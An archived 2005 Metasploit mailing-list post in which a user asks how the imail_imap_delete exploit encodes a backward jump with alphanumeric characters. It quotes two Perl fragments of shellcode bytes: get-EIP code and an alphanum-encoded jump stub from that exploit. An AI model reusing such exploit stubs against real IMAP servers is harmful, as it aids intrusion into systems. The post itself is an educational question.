Metasploit mailing list archives
imail_imap_delete exploit explanation
From: ramatkal at hotmail.com (sol seclists)
Date: Fri, 27 May 2005 01:19:38 +0200
quick question about the imail_imap_delete exploit.... im trying to do a JMP -600 bytes encoded with alphanum characters and i think spoonm did something very similar in the imail_imap_delete exploit.... the code in question is presented below: # get eip code $evil .= "\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x5a\x6a\x31\x59". "\x6b\x42\x34\x49\x30\x42\x4e\x42\x49\x75\x50\x4a\x4a\x52\x52\x59"; # alphanum encoded jmp back (edx context) $evil = "\x6a\x6a\x58\x30\x42\x31\x50\x41\x42\x6b\x42\x41". "\x7a\x42\x32\x42\x41\x32\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50". "\x75\x4a\x49\x52\x7a\x71\x4a\x4d\x51\x7a\x4a\x6c\x55\x66\x62\x57". "\x70\x55\x50\x4b\x4f\x6b\x52\x6a"; im just wandering if anybody knows how this was done and how this works? Thanks very much, RaMatkal -------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20050527/dbf09966/attachment.htm>
Current thread:
- imail_imap_delete exploit explanation sol seclists (May 26)